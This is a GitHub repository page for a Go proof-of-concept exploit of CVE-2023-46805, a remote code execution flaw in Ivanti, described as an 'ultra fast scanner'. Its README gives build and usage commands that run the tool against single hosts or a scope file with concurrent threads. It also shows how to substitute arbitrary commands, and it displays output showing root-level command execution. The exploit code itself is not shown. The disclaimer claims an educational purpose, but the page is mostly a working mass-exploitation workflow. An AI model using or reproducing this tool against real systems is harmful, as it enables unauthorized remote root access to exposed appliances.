[go: up one dir, main page]

Skip to content

w2xim3/CVE-2023-46805

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Title: Proof of Concept for CVE-2023-46805 - For Educational Use Only

License: This work is placed under the Creative Commons Attribution 4.0 International License (CC BY 4.0). You are free to share, copy, distribute, and transmit this work, to adapt it or use it for other purposes, provided the authorship is appropriately attributed.

Disclaimer: This Proof of Concept (PoC) is provided for educational and cybersecurity research purposes only. Neither the author, the affiliated organization, nor any other party involved in the creation, production, or delivery of this content will be liable for any damages, including, but not limited to, direct, indirect, incidental, special, consequential, or punitive damages arising from the use or inability to use this content.

Educational Objective: This PoC is intended to aid the cybersecurity community in understanding and mitigating the vulnerability identified as CVE-2023-46805. It should not be used in a production environment or for malicious activities.

Vulnerability Description: Ivanti RCE

PoC Details:

Usage of ./CVE-Ivanti:
  -cmd string
        The command to replace 'id' in the payload (default "id")
  -t int
        Number of concurrent threads (default 5)
go build
echo "https://1.2.3.4" | ./CVE-Ivanti
https://1.2.3.4 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}

cat myscope.txt -t 5 | ./CVE-Ivanti
https://ssl1.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
https://ssl3.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}

echo "https://1.2.3.4" | ./CVE-Ivanti -cmd 'ls /'

About

CVE-2023-46805 Ivanti POC RCE - Ultra fast scanner.

Topics

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages